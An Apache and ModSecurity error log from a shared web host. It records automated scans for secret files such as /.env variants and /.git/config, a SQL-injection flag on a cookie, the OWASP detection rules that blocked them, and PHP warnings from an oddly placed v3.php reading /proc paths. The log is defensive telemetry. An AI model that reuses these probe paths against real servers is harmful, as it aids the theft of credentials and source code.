[Mon May 11 20:27:53.438599 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:54.070974 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:54.602821 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:55.126276 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:27:55.658802 2026] [:error] [pid 1502013:tid 1502042] [client 194.163.147.90:50111] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:28:08.303754 2026] [:error] [pid 1534836:tid 1534871] [client 79.124.40.174:35256] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:28:10.503679 2026] [security2:error] [pid 1516058:tid 1516109] [client 93.170.212.100:56867] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIfuiMeXtzav-mi9SymNgAAANM"], referer: https://www.piregwan-genesis.com/
[Mon May 11 20:28:27.803526 2026] [security2:error] [pid 1502013:tid 1502033] [client 170.106.143.6:37276] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tchatbooster.com"] [uri "/"] [unique_id "agIfy5Yn-x0CHsbEbP2j6AAAAIQ"]
[Mon May 11 20:28:32.326958 2026] [security2:error] [pid 1502013:tid 1502034] [client 170.106.143.6:54596] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agIf0JYn-x0CHsbEbP2j9AAAAIU"], referer: http://tchatbooster.com
PHP Warning:  filesize(): stat failed for /proc/67/task/67/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/67/task/67/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/67/task/67/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/67/task/67/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/67/task/67/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/67/task/67/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:28:51.593666 2026] [security2:error] [pid 1501883:tid 1501890] [client 43.167.232.38:56134] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIf4zP5Q_-MBliRCAxeSAAAAAU"]
[Mon May 11 20:28:53.029337 2026] [security2:error] [pid 1501831:tid 1501843] [client 129.226.94.52:50172] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agIf5VNddpkriGUb6ZVtVAAAAQo"]
[Mon May 11 20:29:16.993521 2026] [autoindex:error] [pid 1502013:tid 1502044] [client 185.217.125.16:50955] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 20:29:25.595241 2026] [autoindex:error] [pid 1501883:tid 1501889] [client 185.217.125.16:56780] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 20:29:32.429874 2026] [security2:error] [pid 1511173:tid 1511190] [client 170.106.143.6:40296] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/archives.html"] [unique_id "agIgDPjVc-A-CSptvm1o1wAAAE4"], referer: http://apoe.fr/archives.html
[Mon May 11 20:29:35.800832 2026] [autoindex:error] [pid 1516058:tid 1516106] [client 185.217.125.16:58488] AH01276: Cannot serve directory /home/poledemo/public_html/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 20:29:41.717770 2026] [security2:error] [pid 1516058:tid 1516090] [client 119.48.134.141:13440] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: c376fafe841491dd0057a922ea7b747b||1778525981||1778525621"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2021/02/cropped-favicon-rent-paradise-32x32.png"] [unique_id "agIgFSMeXtzav-mi9Sym3gAAAMA"]
[Mon May 11 20:29:41.717994 2026] [security2:error] [pid 1516058:tid 1516090] [client 119.48.134.141:13440] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2021/02/cropped-favicon-rent-paradise-32x32.png"] [unique_id "agIgFSMeXtzav-mi9Sym3gAAAMA"]
[Mon May 11 20:29:42.445705 2026] [security2:error] [pid 1516058:tid 1516090] [client 119.48.134.141:13440] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIgFSMeXtzav-mi9Sym3gAAAMA"]
[Mon May 11 20:29:42.859808 2026] [autoindex:error] [pid 1516058:tid 1516113] [client 185.217.125.16:63743] AH01276: Cannot serve directory /home/poledemo/public_html/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 20:29:45.061363 2026] [security2:error] [pid 1534836:tid 1534884] [client 209.38.97.4:44146] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "k06.fr"] [uri "/.git/config"] [unique_id "agIgGdeaRXe5lR8y0ZOJhAAAAU0"]
[Mon May 11 20:29:45.061951 2026] [security2:error] [pid 1534836:tid 1534884] [client 209.38.97.4:44146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "k06.fr"] [uri "/.git/config"] [unique_id "agIgGdeaRXe5lR8y0ZOJhAAAAU0"]
[Mon May 11 20:29:45.062812 2026] [security2:error] [pid 1534836:tid 1534884] [client 209.38.97.4:44146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "k06.fr"] [uri "/.git/config"] [unique_id "agIgGdeaRXe5lR8y0ZOJhAAAAU0"]
[Mon May 11 20:29:45.158600 2026] [security2:error] [pid 1502013:tid 1502050] [client 209.38.97.4:38550] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "k06.fr"] [uri "/.git/config"] [unique_id "agIgGZYn-x0CHsbEbP2kdwAAAJg"]
[Mon May 11 20:29:45.158846 2026] [security2:error] [pid 1502013:tid 1502050] [client 209.38.97.4:38550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "k06.fr"] [uri "/.git/config"] [unique_id "agIgGZYn-x0CHsbEbP2kdwAAAJg"]
[Mon May 11 20:29:45.159669 2026] [security2:error] [pid 1502013:tid 1502050] [client 209.38.97.4:38550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "k06.fr"] [uri "/.git/config"] [unique_id "agIgGZYn-x0CHsbEbP2kdwAAAJg"]
[Mon May 11 20:29:47.686711 2026] [security2:error] [pid 1511173:tid 1511179] [client 43.135.138.128:36972] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agIgG_jVc-A-CSptvm1o8AAAAEM"]
[Mon May 11 20:29:49.867326 2026] [:error] [pid 1501831:tid 1501857] [client 220.181.108.83:43154] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:30:01.829270 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agIgKZYn-x0CHsbEbP2kmwAAAIM"]
[Mon May 11 20:30:01.829569 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agIgKZYn-x0CHsbEbP2kmwAAAIM"]
[Mon May 11 20:30:01.832866 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agIgKZYn-x0CHsbEbP2kmwAAAIM"]
[Mon May 11 20:30:01.861350 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agIgKZYn-x0CHsbEbP2knAAAAIM"]
[Mon May 11 20:30:01.861591 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agIgKZYn-x0CHsbEbP2knAAAAIM"]
[Mon May 11 20:30:01.861892 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agIgKZYn-x0CHsbEbP2knAAAAIM"]
[Mon May 11 20:30:01.889615 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agIgKZYn-x0CHsbEbP2knQAAAIM"]
[Mon May 11 20:30:01.889830 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agIgKZYn-x0CHsbEbP2knQAAAIM"]
[Mon May 11 20:30:01.890110 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agIgKZYn-x0CHsbEbP2knQAAAIM"]
[Mon May 11 20:30:01.918729 2026] [:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:30:01.949264 2026] [:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:30:01.978057 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/admin/.env"] [unique_id "agIgKZYn-x0CHsbEbP2koAAAAIM"]
[Mon May 11 20:30:01.978312 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/admin/.env"] [unique_id "agIgKZYn-x0CHsbEbP2koAAAAIM"]
[Mon May 11 20:30:01.978612 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agIgKZYn-x0CHsbEbP2koAAAAIM"]
[Mon May 11 20:30:02.007146 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agIgKpYn-x0CHsbEbP2koQAAAIM"]
[Mon May 11 20:30:02.007391 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agIgKpYn-x0CHsbEbP2koQAAAIM"]
[Mon May 11 20:30:02.007677 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agIgKpYn-x0CHsbEbP2koQAAAIM"]
[Mon May 11 20:30:02.034817 2026] [:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:30:02.064301 2026] [security2:error] [pid 1502013:tid 1502066] [client 213.209.159.175:62374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.example"] [unique_id "agIgKpYn-x0CHsbEbP2kowAAAIM"]
